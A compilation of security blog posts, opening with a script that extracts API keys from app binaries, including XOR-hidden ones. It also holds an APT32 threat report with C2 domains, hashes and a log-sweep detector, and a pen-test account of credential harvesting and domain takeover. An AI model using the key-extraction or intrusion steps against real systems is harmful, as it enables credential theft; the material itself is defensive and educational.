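    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def find_secrets(blob: bytes) -> List[Tuple[str, int, str]]:
    """Return (kind, xor_key, value) for every secret found in the raw bytes (xor_key 0)
    or under any single-byte XOR mask, which is all it costs to undo that obfuscation."""
    hits = []
    for key in range(256):
        decoded = blob if key == 0 else bytes(b ^ key for b in blob)
        for run in printable_runs(decoded):
            for kind, pat in SECRET_PATTERNS.items():
                for m in pat.finditer(run):
                    hits.append((kind, key, m.group()))
            # Unobfuscated, random-looking strings are worth a look even without a known prefix.
            if key == 0 and len(run) >= 20 and shannon_entropy(run) > 4.0:
                hits.append(("high_entropy_string", 0, run))
    return hits


def build_sample_binary() -> bytes:
    """Constructed stand-in for a stripped app binary; not a real app, and both keys are made up."""
    plain_key = b"AKIAEXAMPLEKEY000001"                       # embedded as-is
    hidden = b"sk_live_EXAMPLEexampleEXAMPLE01"               # 'protected' by XOR with one byte
    obfuscated = bytes(b ^ 0x5A for b in hidden)
    filler = bytes(range(0x80, 0x100))                        # non-printable junk around them
    return (b"\x7fELF\x02\x01\x01" + filler + b"/api/v1/login\x00"
            + plain_key + b"\x00" + obfuscated + b"\xff" + filler)


if __name__ == "__main__":
    for kind, key, value in find_secrets(build_sample_binary()):
        print(f"{kind:22s} xor_key=0x{key:02x} {value}")
```

Run it and both keys come out, the obfuscated one tagged with the XOR byte that undid it. Real obfuscators do more than a single XOR, but the lesson holds: whatever the app can decrypt at runtime, an analyst with the app can decrypt too, so the only secret that stays secret is the one that never ships in the binary.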

If you’re interested in learning more ways hackers can breach mobile app security, check out the infographic below from CleverTap.

Authored by Drew Page. Drew is a content marketing lead from San Diego, where he helps create epic content for companies like CleverTap. He loves learning, writing and playing music. When not surfing the web, you can find him actually surfing, in the kitchen or in a book.

Safe Collaboration with McAfee and Microsoft Teams

McAfee MVISION Cloud for Microsoft Teams, the first and only CASB certified for Microsoft Teams, now offers a frictionless approach to data protection collaboration within Teams with new support for Microsoft encrypted webhooks. McAfee enforces compliance in Microsoft Teams via Data Loss Prevention (DLP) policies by using Microsoft Graph change notifications that provide a secure way to monitor chat messages in Teams via encrypted resource data in the payload. This enables McAfee customers to improve productivity of their employees by letting them use Microsoft Teams as a collaboration platform and participate in conversations and calls, and upload and share documents without compromising security.

Working from home has become a new reality for many, as more and more companies ask their staff to work remotely. Already, we are seeing how solutions that enable remote work and learning across chat, video, and file collaboration have become central to the way we work. Microsoft has seen an unprecedented spike in Teams usage: it now has more than 44 million daily users,* a figure that has grown by 12 million in just the last few weeks, and those users generated over 900 million meeting and calling minutes on Teams each day during the week of March 16. Microsoft shared these figures on Teams’ third anniversary.

McAfee MVISION Cloud for Microsoft Teams offers a cloud-native solution for organizations to consistently protect their data and defend against threats in the cloud. Here are a few of the use cases:

  • Modern data security. IT can extend existing DLP policies to messages and files in all types of Teams channels, enforcing policies based on keywords, fingerprints, data identifiers, regular expressions and match highlighting for content and metadata.
  • Collaboration control. Messages or files posted in channels can be restricted to specific users, including blocking the sharing of data to any external location.
  • Comprehensive remediation. Enables auditing of regulated data uploaded to Microsoft Teams and remediates policy violations by coaching users, notifying administrators, quarantining, tombstoning, restoring and deleting user actions. End users can autonomously correct their actions, removing incidents from IT’s queue.
  • Threat prevention. Empowers organizations to detect and prevent anomalous behavior indicative of insider threats and compromised accounts. McAfee captures a complete record of all user activity in Teams and leverages machine learning to analyze activity across multiple heuristics to accurately detect threats.
  • Forensic investigations: With an auto-generated, detailed audit trail of all user activity, MVISION Cloud provides rich capabilities for forensics and investigations.
  • On-the-go security, for on-the-go policies. Helps secure multiple access modes, including browsers and native apps, and applies controls based on contextual factors, including user, device, data and location. Personal devices lacking adequate control over data can be blocked from access.

Here’s a video introduction to MVISION Cloud for Microsoft Teams

Available now, MVISION Cloud for Teams helps meet customer demand in securing their most important cloud resources. McAfee MVISION Cloud for Microsoft Teams is now in use with a substantial number of large enterprise customers to enable their security, governance and compliance capabilities. The solution fits all industry verticals due to the flexibility of policies and its ease of use.

*Microsoft defines daily active usage as the maximum daily users performing an intentional action in a 24-hour period across the desktop client, mobile client, and web client. Intentional actions include sending or replying to a chat, joining a meeting, or opening a file in Teams. Passive actions like auto boot, minimizing a screen, or closing the app are not included.

The post Safe Collaboration with McAfee and Microsoft Teams appeared first on McAfee Blogs.

Email bungle at company seeking jobkeeper payments exposes staff’s personal details

Names, addresses and birthdates of more than 100 people shared in privacy breach

The company responsible for delivering traffic reports on radio and TV stations across Australia accidentally sent out the dates of birth, names and home addresses of more than 100 current and former staff to potentially thousands of people as the company seeks to apply for the jobkeeper payments.

Australian Traffic Network provides short traffic report updates during news bulletins to 80 radio and television stations, including the ABC, Seven, Nine, 10, 2GB and Triple M.

Getting Started With ROT Obfuscation

Hello, my name is John Strand. In this video, we’re going to be talking about ROT or rotate. Why exactly are we talking about one specific thing? Well, this particular video is used with our Cyber Range that we’re establishing at Black Hills Information Security and it’s very common when you’re pentesting or you’re doing […]

The post Getting Started With ROT Obfuscation appeared first on Black Hills Information Security.

How to Stay Secure While Distance Learning: Don’t Get Schooled by Hackers

Many students hold their college experience near and dear to their hearts. Apart from working towards a degree and a desired career path, students rely on college to make lifelong friends and gain a heightened sense of responsibility and independence. But due to recent circumstances, many college students have had this experience interrupted or put on pause. With many schools closed for the remainder of the year, college students have moved from in-person course work to virtual classrooms, or distance learning. Distance learning has consequently led to a rapid uptick in online activity among college students. But as more students continue their curriculum from home and online activity increases, the need for enhanced security increases as well.

Video Lectures

The transition to distance learning has led to many teachers and schools turning to online video conferencing tools to conduct virtual lectures. However, many of these tools have proven to lack the necessary security measures. As we’ve previously discussed, many users have been found sharing their meeting links on social media platforms like Twitter. This could allow an attacker to simply click on one of these links and interrupt an online lecture or club meeting with inappropriate content. As a result, students could lose valuable time meant to be spent toward their education. And while some schools have banned some online conferencing tools from being used for distance learning, it’s important for students to stay educated on the various security risks involved with video lectures, whether their school has provided guidelines or not.  

Connected Devices & Home Networks

Many schools and universities have asked for students to move out of their on-campus housing for the remainder of the school year. Moving off campus means that the devices and school networks provided by a campus may no longer be available to students. While many students already leverage their personal device for schoolwork, this situation makes those devices the only option.  

Additionally, much like those who have made the transition to working from home, using personal devices on home networks could pose a variety of threats. Students are moving from their universities’ professionally managed networks to home Wi-Fi setups protected with basic passwords, which are usually more easily infiltrated by hackers. Once a hacker gains access to a student’s home network, they have the opportunity to exploit other devices connected to the Wi-Fi.  

How to Secure Your Virtual Classroom

So, what can students do to help ensure that their path towards a degree isn’t interrupted by the adoption of distance learning? Taking online security seriously is the perfect place to start. Here are some tips to help ensure that learning from home goes as smoothly as possible.  

Choose an Encrypted Online Conferencing Tool

Does the video conferencing tool you’re considering use end-to-end encryption? This ensures that only meeting participants have the ability to decrypt secure meeting content. Additionally, be sure to read the privacy policies listed by the video conferencing programs to find the one that is the most secure and fits your needs.   

Use a VPN

Use a VPN, which encrypts, or scrambles, the data your device sends and receives so that others on the same network can’t read it. Keep in mind that a VPN protects only the traffic of the device running it; it does not protect the other devices on your Wi-Fi. For those, secure the network itself: a strong, unique Wi-Fi passphrase, WPA2 or WPA3 encryption, and up-to-date router firmware.

Take Password Protection Seriously.

Take the time to secure your devices and home network with unique, complex passwords. Many users, including students, utilize the same password, or variations of it, across all their accounts. This means if a hacker discovers just one password, all personal data is suddenly at risk. Therefore, it is crucial to diversify your passcodes to ensure hackers cannot obtain access to all your accounts at once, should one password be compromised. You can also employ a password manager to keep track of your credentials.  

Enable Two-Factor or Multi-Factor Authentication

Two or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification. This reduces the risk of successful impersonation by hackers. 

Stay Educated on Security Precautions

As you adapt to learning from home, you’ll likely consider downloading various online tools to help make the transition easier. Before downloading the first tools you see, do your research and check for known security vulnerabilities or threats associated with them.

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 


The post How to Stay Secure While Distance Learning: Don’t Get Schooled by Hackers appeared first on McAfee Blogs.

Updated Guidance: Responding to a Data Breach

PCI Security Standards Council recently updated the guidance document: Responding to a Cardholder Data Breach. This guide is intended to help merchants and service providers with incident response preparation. This guide also describes how and when a Payment Card Industry Forensic Investigator (PFI) should be engaged to assist.

Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage

From at least January to April 2020, suspected Vietnamese actors APT32 carried out intrusion campaigns against Chinese targets that Mandiant Threat Intelligence believes were designed to collect intelligence on the COVID-19 crisis. Spear phishing messages were sent by the actor to China's Ministry of Emergency Management as well as the government of Wuhan province, where COVID-19 was first identified. While targeting of East Asia is consistent with the activity we’ve previously reported on APT32, this incident, and other publicly reported intrusions, are part of a global increase in cyber espionage related to the crisis, carried out by states desperately seeking solutions and nonpublic information.

Phishing Emails with Tracking Links Target Chinese Government

The first known instance of this campaign was on Jan. 6, 2020, when APT32 sent an email with an embedded tracking link (Figure 1) to China's Ministry of Emergency Management using the sender address lijianxiang1870@163[.]com and the subject 第一期办公设备招标结果报告 (translation: Report on the first quarter results of office equipment bids). The embedded link contained the victim's email address and code to report back to the actors if the email was opened.

Figure 1: Phishing email to China's Ministry of Emergency Management

Mandiant Threat Intelligence uncovered additional tracking URLs that revealed targets in China's Wuhan government and an email account also associated with the Ministry of Emergency Management.

  • libjs.inquirerjs[.]com/script/<VICTIM>
  • libjs.inquirerjs[.]com/script/<VICTIM>
  • m.topiccore[.]com/script/<VICTIM>
  • m.topiccore[.]com/script/<VICTIM>
  • libjs.inquirerjs[.]com/script/<VICTIM>

The libjs.inquirerjs[.]com domain was used in December as a command and control domain for a METALJACK phishing campaign likely targeting Southeast Asian countries.

Additional METALJACK Activity Suggests Campaigns Targeting Mandarin Speakers Interested in COVID-19

APT32 likely used COVID-19-themed malicious attachments against Chinese speaking targets. While we have not uncovered the full execution chain, we uncovered a METALJACK loader displaying a Chinese-Language titled COVID-19 decoy document while launching its payload.

When the METALJACK loader, krpt.dll (MD5: d739f10933c11bd6bd9677f91893986c) is loaded, the export "_force_link_krpt" is likely called. The loader executes one of its embedded resources, a COVID-themed RTF file, displaying the content to the victim and saving the document to %TEMP%.

The decoy document (Figure 2) titled 冠状病毒实时更新:中国正在追踪来自湖北的旅行者, MD5: c5b98b77810c5619d20b71791b820529 (Translation: COVID-19 live updates: China is currently tracking all travelers coming from Hubei Province) displays a copy of a New York Times article to the victim.

Figure 2: COVID-themed decoy document

The malware also loads shellcode in an additional resource, MD5: a4808a329b071a1a37b8d03b1305b0cb, which contains the METALJACK payload. The shellcode performs a system survey to collect the victim's computer name and username and then appends those values to a URL string using libjs.inquirerjs[.]com. It then attempts to call out to the URL. If the callout is successful, the malware loads the METALJACK payload into memory.

It then uses vitlescaux[.]com for command and control.
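The tracking links and the METALJACK survey callback both put a victim identifier after /script/ on the actor's domains, which makes them easy to sweep for in web proxy logs. The following Python is an added example, not part of the Mandiant report: the three domains and the /script/<VICTIM> URL shape come from the text above, while the log format, the client IPs and the victim identifiers are constructed for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Infrastructure named in the report, kept defanged exactly as written there.
APT32_DOMAINS = {
    "libjs.inquirerjs[.]com",  # tracking links; METALJACK survey callback
    "m.topiccore[.]com",       # tracking links
    "vitlescaux[.]com",        # METALJACK command and control
}


def refang(indicator):
    return indicator.replace("[.]", ".")


DOMAINS = {refang(d) for d in APT32_DOMAINS}

# Constructed proxy log (not real telemetry). Fields: timestamp client_ip user method url status
SAMPLE_PROXY_LOG = """\
2020-01-06T09:12:44Z 10.1.2.3 user1 GET http://libjs.inquirerjs.com/script/user1@ministry.example 200
2020-01-06T09:13:01Z 10.1.2.3 user1 GET https://www.example.org/index.html 200
2020-02-11T14:02:10Z 10.1.7.9 user2 GET http://m.topiccore.com/script/user2@ministry.example 200
2020-03-02T08:40:19Z 10.1.7.9 user2 GET http://libjs.inquirerjs.com/script/WS-0142_user2 200
2020-03-02T08:41:05Z 10.1.7.9 user2 POST https://vitlescaux.com/update 200
2020-03-02T08:41:07Z 10.1.7.9 user2 GET https://notvitlescaux.com/ 200
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<user>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+)$"
)


def domain_matches(host):
    """True for an indicator domain or any subdomain of it; a host that merely ends
    with the same letters (notvitlescaux.com) must not match."""
    return any(host == d or host.endswith("." + d) for d in DOMAINS)


def sweep_proxy_log(text):
    """Group matching requests by client IP: {ip: [(timestamp, host, path), ...]}."""
    hits = defaultdict(list)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["url"])
        host = (parts.hostname or "").lower()
        if domain_matches(host):
            hits[m["ip"]].append((m["ts"], host, parts.path))
    return dict(hits)


def victim_identifiers(hits):
    """The tracking and survey URLs carry the victim identifier after /script/.
    Collect them so the mail and endpoint teams know which mailboxes and hosts to pull."""
    ids = set()
    for entries in hits.values():
        for _ts, _host, path in entries:
            if path.startswith("/script/") and len(path) > len("/script/"):
                ids.add(path[len("/script/"):])
    return ids


if __name__ == "__main__":
    found = sweep_proxy_log(SAMPLE_PROXY_LOG)
    for ip, entries in found.items():
        print(ip, entries)
    print(sorted(victim_identifiers(found)))
```

A hit on a /script/ path from a mail client's IP is the "email was opened" beacon; a later hit whose identifier is a hostname plus username rather than a mailbox is the shellcode's survey callback, and the vitlescaux[.]com request after it means the payload was loaded. The order of those three is the triage priority.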


The COVID-19 crisis poses an intense, existential concern to governments, and the current air of distrust is amplifying uncertainties, encouraging intelligence collection on a scale that rivals armed conflict. National, state or provincial, and local governments, as well as non-government organizations and international organizations, are being targeted, as seen in reports. Medical research has been targeted as well, according to public statements by a Deputy Assistant Director of the FBI. Until this crisis ends, we anticipate related cyber espionage will continue to intensify globally.









Indicators

  • Email address: lijianxiang1870@163[.]com (sender of the Jan. 6 phishing email)
  • MD5: d739f10933c11bd6bd9677f91893986c (krpt.dll, METALJACK loader)
  • MD5: a4808a329b071a1a37b8d03b1305b0cb (shellcode resource carrying the METALJACK payload)
  • MD5: c5b98b77810c5619d20b71791b820529 (decoy document, not malicious)

Detecting the Techniques


Signature names by product:

  • Endpoint Security: (not listed)
  • Network Security: Trojan.Apost.FEC2, Trojan.Apost.FEC3, fe_ml_heuristic
  • Email Security: Trojan.Apost.FEC2, Trojan.Apost.FEC3, fe_ml_heuristic



Mandiant Security Validation Actions

  • A150-096 - Malicious File Transfer - APT32, METALJACK, Download
  • A150-119 - Protected Theater - APT32, METALJACK Execution
  • A150-104 - Phishing Email - Malicious Attachment, APT32, Contact Information Lure

MITRE ATT&CK Technique Mapping



  • Initial Access: Spearphishing Attachment (T1193), Spearphishing Link (T1192)
  • Execution: Regsvr32 (T1117), User Execution (T1204)
  • Defense Evasion: Regsvr32 (T1117)
  • Command and Control: Standard Cryptographic Protocol (T1032), Custom Command and Control Protocol (T1094)

Using Big Tech to tackle coronavirus risks swapping one lockdown for another | Adam Smith

An app that logs movements and contacts might seem like a fair trade now but we risk giving away our privacy for good

Even when the lockdown is lifted, there is no guarantee that life will ever return to normal. To prevent a future outbreak of coronavirus, the UK will need to roll out mass testing, maintain some social distancing measures and closely monitor communities to curb future flare-ups.

In pursuing that last aim, governments across the world are developing technology to track our movements. When lockdown ends, technology could be a valuable means of controlling future outbreaks, alerting people to cases of Covid-19 in their area and hopefully preventing future shutdowns.


COVID-19 and climate change

Today is Earth Day, an annual global event that aims to raise awareness of environmental issues.

This year’s event – the fiftieth Earth Day – falls in the midst of an unprecedented interruption to life as we know it, and so provides a unique opportunity for us to understand the impact we and our working habits have on the natural world.

The environmental benefits of staying at home

It should come as no surprise to learn that restrictions to contain the spread of the coronavirus pandemic have had a noticeably positive effect on the environment: already, air quality has improved, carbon emissions have dropped significantly and wildlife is thriving where once it was absent.

These are, of course, short-term effects, and many experts are understandably concerned that the environmental benefits caused by the lockdown will quickly be reversed once restrictions are lifted. However, we don’t have to go back to the way we were before. We can learn from the experience and change the way we live and work – to everyone’s advantage.

Calculating our own impact

Here at IT Governance, we have a climate change action group that aims to reduce our own environmental impact. We’ve calculated that in the current seven-week lockdown period alone we will have saved 41.46 metric tonnes of CO2 emissions: equivalent to the greenhouse gas emissions from an average passenger vehicle driving 101,737 miles, or around the world more than four times.

Obviously, this saving will be offset by increases in CO2 created in our homes, but the overall effect is undoubtedly still a good one. Factor in all the other companies that switched to remote working in mid-March and the effect on the environment in just a few weeks is little short of astonishing.

So, the question all responsible companies will now be asking is: how we can continue to benefit the environment and maintain productivity once the lockdown restrictions are lifted?

Homeworking: the new normal?

Campaigners have spent years pointing out that, with communication and collaboration technology, there’s little justification in insisting on your workforce assembling in one place each and every day unless they absolutely have to – they waste time commuting, you waste money providing offices and equipment, and both of you waste energy and cause damage to the environment.

Obviously, there are countless organisations that can’t modify their working practices to any great extent. For many others, the realisation that homeworking is actually a perfectly viable way of operating might well lead to remote staff continuing in some form or another after the restrictions are lifted – or at least for there to be greater flexibility than before COVID-19 came along.

Training courses and remote delivery

All change is, to an extent, disruptive, and if your staff have suddenly switched to homeworking you will face many challenges that you might not have anticipated or had time to address.


Fortunately, we have everything you need to help adjust to this new normality.

Almost all of our products and services are capable of being delivered remotely, and we’ve launched a range of new ones to help our clients through the coronavirus crisis, including training and staff awareness courses, penetration testing and vulnerability scanning.



The post COVID-19 and climate change appeared first on IT Governance UK Blog.

SOC vs MITRE APT29 evaluation – Racing with Cozy Bear

MITRE just released the results of the APT29 evaluation of 21 commercial cybersecurity products today, including McAfee MVISION EDR. This evaluation, conducted as a collaborative attack and defense exercise, is based on ATT&CK®, a freely available, open-source knowledge base of adversary tactics and techniques that blue teamers (the defenders) widely use to find gaps in visibility, defensive tools and processes.

In this evaluation, MITRE played the role of the red team (the attacker), using its ATT&CK knowledge base to examine the ability of MVISION EDR and MVISION Endpoint to detect the tactics and techniques used by APT29 (also known as Cozy Bear, The Dukes and Cozy Duke, among others). APT29 is the group, believed to operate on behalf of the Russian government, that compromised the Democratic National Committee starting in 2015. The evaluation took place over two days; on each day a different version of the attack, comprising 10 steps, was executed using several techniques attributed to APT29.

While it’s important to note that the goal of these evaluations is not to rank or score products, our analysis of the results found that McAfee’s blue team was able to use MVISION EDR to obtain a significant advantage over the adversary, achieving:

  • 100% visibility of the attack steps on Day 1, and 89% on Day 2
  • 90% detection of the attack steps on Day 1, and 67% on Day 2

During the assessment we also installed MVISION Endpoint in observe, non-blocking mode. This allowed us to determine that the blue team would have automatically blocked 40% of all the attack steps performed by the red team on Day 1 and 33% on Day 2.

However, as all practitioners know, cyber defense is more complicated than what raw data can express, especially when dealing with sophisticated threat actors. Years of warfare both in the physical and cyber space have taught us that observing and analyzing raw data is useless until it is framed in a way that provides context to both attackers and defenders.

While attacker actions and behaviors can be modeled effectively using MITRE ATT&CK, models[1] like Time Based Security (TBS) or OODA loop (Observe, Orient, Decide, Act) provide the context that blue teamers and security operations teams need to make tactical defensive decisions.

Time Based Security – Protection, Detection & Response in context

Time Based Security[2] (TBS), was introduced in 1999 by Winn Schwartau and is still one of the most relevant, effective and yet terribly simple security models any defender can apply today. The principles enumerated in Schwartau’s book are essential for any blue teamer, regardless of whether you are a CISO, a SOC analyst, a security architect or an incident responder. TBS provides a systematic and reproducible method to answer questions like, how much ‘security’ a product or technology provides, or in this case, how secure your systems are against an adversary that behaves like APT29.

TBS is a quantitative method that merges information security and risk management to support security budget decisions. For example, when evaluating how much ‘security’ a product or technology such as EDR provides, security operations teams and CISOs need answers to these questions:

  1. How long are my systems exposed?
  2. How long before we detect a compromise?
  3. How long before we respond?

To illustrate, in the physical world, you can buy a safe to protect any asset, and you would know how long it would take for somebody to break through that safe. These performance ratings are generally ranked by the amount of time your valuables are safe when under attack by either burglary or fire[3]. But we would never think of just putting the safe and waiting for the bad guys to break in it, sitting idle, right? That is why we put detection mechanisms around it, motion sensors, heat sensors, window alarms, vibration sensors, cameras, and security guards to monitor them. Can we measure how long it takes for an attacker to trip any of those sensors? Absolutely! Once that alarm goes off, what do we do? We react, we call the police and they show up to limit the impact. Can we measure that reaction time? Of course! Everything in the physical security world is about time.

Figure 1: Quoting Schwartau, “If it takes longer to detect and to respond to an intrusion than the amount of protection time afforded by the security measures, that is if P < D + R, then effective security is impossible to achieve in this system.”

TBS establishes that in the cybersecurity world, just like in the physical one, protection runs parallel to detection and reaction (see Figure 1). If the intruder is willing to dedicate resources to bypass the protection mechanisms, and in the absence of any detection or reaction, the attacker can always win. In the end, compromising a system is just a matter of time.

Racing with APT29 – It’s All About Time

While many vendors focus solely on the raw data and statistics, our approach is focused on modeling how a blue teamer, a SOC analyst or a cyber defender would do against this attack, considering the TBS model. For this evaluation, our blue team used our products as follows:

  • Endpoint Protection – Protection was not the focus of this MITRE ATT&CK evaluation, so we assumed the worst case and installed McAfee MVISION Endpoint with blocking disabled, in monitoring mode. Even so, the alarms raised by McAfee’s protection mechanisms can be treated as a highly tactical detection signal: as every SOC analyst knows, a block is never “block and forget” but “block and investigate”.
  • Endpoint Detection through McAfee MVISION EDR (focus of MITRE ATT&CK). 

While MVISION EDR reaction capabilities were not considered as part of this evaluation, it’s evident that a fast reaction is a key element in the TBS equation (P > D+R) for a reduced exposure and therefore to a limited impact against any adversary [4].

Using the results of the evaluation, we modeled the data following an attack timeline, grouping the techniques executed by the MITRE ATT&CK red team for Days 1 and 2 into each of the steps (attack milestones) they employed. As a SOC, our objective would be to block, detect and react as early as possible in the attack timeline, knowing that once the attacker has stolen credentials and started lateral movement, their advantage and the impact of the attack grows exponentially. For this reason, we draw a line right before the ‘lateral movement’ step. We call this the ‘breakout point’.

To represent the data for each evaluation day, we list the detection categories used by MITRE[5] in addition to:

  • Block: Detections triggered by MVISION Endpoint that would have resulted in a blocked activity. These alarms would have slowed down the attacker as well as provided a highly tactical detection to the SOC.
  • Host interrogation: Represents data that is manually pulled from an endpoint. In MVISION EDR this data can reside in the Cloud or on the endpoint itself, and can be retrieved through real time searches, the collection engine, or through automated investigations.

Observing Figures 2 & 3 below, the results show:

  1. Had prevention been enabled on the endpoints (the default configuration for McAfee MVISION Endpoint), the defenders would have blocked 29% of the steps performed by the attacker before the breakout point on Day 1, and 40% on Day 2. As a SOC, this would have met our objective of disrupting the attacker several times, slowing down the attack to extend our protection time (P).
  2. The blue team was able to detect 86% of the steps performed by the attacker before the breakout point on Day 1, and 60% on Day 2. The early detections (D) of these tactics and techniques, augmented with additional context provided by telemetry and host interrogation allow the SOC to reduce exposure and speed up response and remediation efforts (R).
  3. The blue team was able to see 100% of the steps performed by the attacker before the breakout point on Day 1, and 80% on Day 2. This visibility was readily available to the SOC without the need to use additional tools and therefore saving time.

Figure 2: APT29 emulated on 10 steps using Pupy, Meterpreter, and custom scripts (Day 1)


Figure 3: APT29 emulated on 10 steps using POSHC2 and custom scripts (Day 2). Note that step 19 was removed by MITRE due to emulation issues.


On both Day 1 and Day 2, the blue team would have received early indication of an attack multiple times before the breakout point. The protection capabilities would also have disrupted the attacker several times. All this gives defenders time to respond using EDR’s capabilities to triage, scope, investigate, contain, and eradicate the threat, including the isolation of the affected systems. Additionally, MVISION EDR capabilities like threat clustering and machine learning assisted investigations would have helped to accelerate the response, resulting in reduced exposure time (Exposure = Detection + Reaction), which would have allowed the SOC to manage the risk of this intrusion and reduce the impact of a compromise.

In summary, security solutions cannot be evaluated by raw data without putting them into context and into the right defensive framework. The MITRE APT29 evaluation shows how McAfee provides effective time-based security by combining protection, as well as early detection and fast response across critical points along the attack chain, enabling Security Operation teams and cyber defenders to reduce exposure and limit impact of attacks, even sophisticated ones.

* MVISION Endpoint is part of our McAfee endpoint protection technology, optimized for Windows 10.







The post SOC vs MITRE APT29 evaluation – Racing with Cozy Bear appeared first on McAfee Blogs.

Pen Testing Stories from the Field: Combining Tools to Take Over an Entire Domain


There is no single set of instructions on how to run a penetration test, and no one manual on how to be a pen tester. The only real constant is that each job is a combination of preparation and improvisation to adapt and adjust to each environment’s quirks. So one of the best ways to learn and improve your own penetration testing techniques and strategies is from your peers, whether it be through watching them on the job, or from talking shop at a conference and hearing how they handled an interesting assignment. With this in mind, after we spoke with a pen tester about a recent job his team had completed with the assistance of Core Security’s tools, we asked him to go into detail, in order to pass along some valuable lessons from the field.

What was the engagement?

We were tasked with completing an internal penetration test on a large, multi-national manufacturer.

What tools were you using?

We had a jumpbox laptop that we placed on the network. We used a Nessus vulnerability scanner, as well as a variety of pen testing tools, including Core Impact and Cobalt Strike. And of course, our powers of reasoning and deduction.

Had this company ever had a pen test performed?

Yeah, quite a few, actually. They told us the one they had conducted the year prior had turned up “nothing in particular,” so we were pretty curious to check out the environment for ourselves.

So, where did you begin?

Once we had the jumpbox laptop installed, we ran the Nessus scan. The scan indicated that there were 23 machines running the SolarWinds DameWare Mini Remote Control—a tool that IT teams can use for remotely accessing employees’ computers, laptops, or servers for support. Core Impact happens to have an excellent exploit for this product, so we used it and managed to get onto 13 machines. We installed an agent onto all 13 of these machines, but only as an unprivileged user account, so our initial access was fairly limited.

How did you manage to escalate your privileges?

We used Impact’s privilege escalation RPT (Rapid Penetration Test), which saved us several hours. CVE-2020-0668 is a privilege elevation vulnerability in the Windows kernel. There is a patch for it, but we still found it on several machines, and were able to use it to place an agent running as SYSTEM, which is the Windows version of what a lot of people know as the “root” or superuser account.

Next, Core Impact’s Windows Secrets Dump module, which can collect user credentials from a compromised machine, helped us obtain the local password hash database. Looking at the database, we noticed that the “administrator” user had the same hash on four of the workstations. We wondered if this administrator had the same credentials on other machines.

It turned out that the administrator did have the same credentials elsewhere, and we were able to get into a couple hundred machines. We used the hash with CrackMapExec to get access to the LSA Secrets, which housed a large amount of domain cached credentials. Ultimately, we were able to harvest 900 other user credentials, including multiple Domain Admins. We also used the hash to deploy the Cobalt Strike beacon payload across other systems compromising the environment even further.

Yikes. How far did you take the compromise?

Oh, we eventually took over the entire domain. We had complete control.

That was probably an unpleasant surprise for the organization. But better that your team found it out now instead of an attacker down the line. How could this have been avoided? What would you suggest they, and other organizations, prioritize to mitigate risk?

Well, to start, patch often and patch everything. If a patch is available for any of your devices, patch them. If a patch is available for any of your third-party software, patch them.

Also, never use the same credentials across machines—it’s a great way for attackers to quickly move laterally across the organization without much effort.  

Use two factor authentication for elevated access. Just do it.

And, naturally, I strongly encourage hiring savvy pen testers on a regular basis to validate those remediations.



DNS is on the Verge of a Major Overhaul

Reading Time: ~ 4 min.

“One of the things about working in internet technology is nothing lasts forever… [Students] come to me and they say, ‘I want to do something that has an impact 20, 50, or 100 years from now.’ I say well maybe you should compose music because none of this technology stuff is going to be around that long. It all gets replaced.” -Paul Mockapetris, co-inventor of the domain name system (DNS)

As foresighted as he may have been, the DNS inventor Paul Mockapetris got one thing wrong in a retrospective interview about his contribution to internet history. Namely, some aspects of technology do have at least 20-year staying power. In this case, his own invention: the domain name system.

But DNS, just three years shy of its fortieth birthday, is on the cusp of a major reimagining. One that could enhance the privacy of business and private users alike for some time to come. According to some experts, it may even be worthy of the title “DNS 2.0.”

The Problem with DNS Today

While DNS has evolved significantly in the more than 35 years since it was originally conceived, its skeletal structure remains much the same. DNS is the internet’s protocol for translating the domain names humans understand into the IP addresses machines use.

The problem is that this system was never designed with privacy or security in mind. With DNS today, requests are made and resolved in plain text, exposing a great deal of information to whoever resolves or inspects them. That is most likely an internet service provider (ISP), but it may be a government entity or some other party. In authoritarian countries, governments can use this information to prosecute individuals for visiting sites with outlawed content. In the United States, it’s more likely to be monetized for its advertising value.

“The problem with DNS is it exposes what you’re doing,” says Webroot product manager and DNS expert Jonathan Barnett. “If I can log a user’s DNS requests, I can see when they work, when they don’t, how often they use Facebook, the Sonos Speakers and Google Nests on their network, all of that. From a privacy perspective, it shows what on the internet is associating with me and my network.”

This can be especially problematic in terms of home routers. Whereas business networks tend to be relatively secure—patched, up-to-date, and modern—”everyone’s home router tends to be set up by someone’s brother-in-law or an inexperienced ISP technician,” warns Barnett. In this case, malicious hackers can change DNS settings to redirect to their own resolvers.

“If you bring a device onto this network and try to navigate to one of your favorite sites, you may never wind up where you intended,” says Barnett.

In the age of COVID-19, it’s becoming an even bigger problem for employers. With a larger workforce working from home than perhaps ever before, traditional defenses at the network perimeter no longer remain.

“To maintain resilience,” says Barnett, “companies need to extend protection beyond the business network perimeter. One of the best ways to do that is through DNS protection that ensures requests are resolved through a trusted resolver and not a potentially misconfigured home network.”

DoH: The Second Coming of DNS

In response to these concerns, DNS over HTTPS (DoH), standardized by the Internet Engineering Task Force in RFC 8484, carries DNS requests inside HTTPS. It uses the same TLS encryption and certificate validation that banks, credit monitoring services and other sites handling sensitive information rely on, so that the requests are hidden from anyone who might use the information improperly.

It does this by wrapping each DNS message in an HTTPS request to the resolver. The TLS handshake verifies that the resolver you reached is the one you intended to reach, and the encrypted channel means no one on the path can read or alter the queries and answers in transit.

“It makes sure no one is messing with a user by changing the results of a request before it’s returned,” says Barnett.

In addition to improving privacy around device usage (any internet-connected device needs to “phone home” occasionally, and every such connection starts with a DNS request), DoH also blunts several DNS-enabled attacks. DNS spoofing, where an attacker on the path forges a response, and DNS hijacking, where queries are redirected to an attacker-controlled resolver as in the home-router example above, both depend on being able to read or rewrite plaintext DNS between the client and its resolver; an authenticated, encrypted channel to a known resolver removes that opportunity. Two caveats matter in practice: DoH protects the path, not the answer, so a malicious or compromised resolver (or a device reconfigured to use an attacker’s DoH server) can still return bad data, and the authenticity of the records themselves is the job of DNSSEC, not DoH.
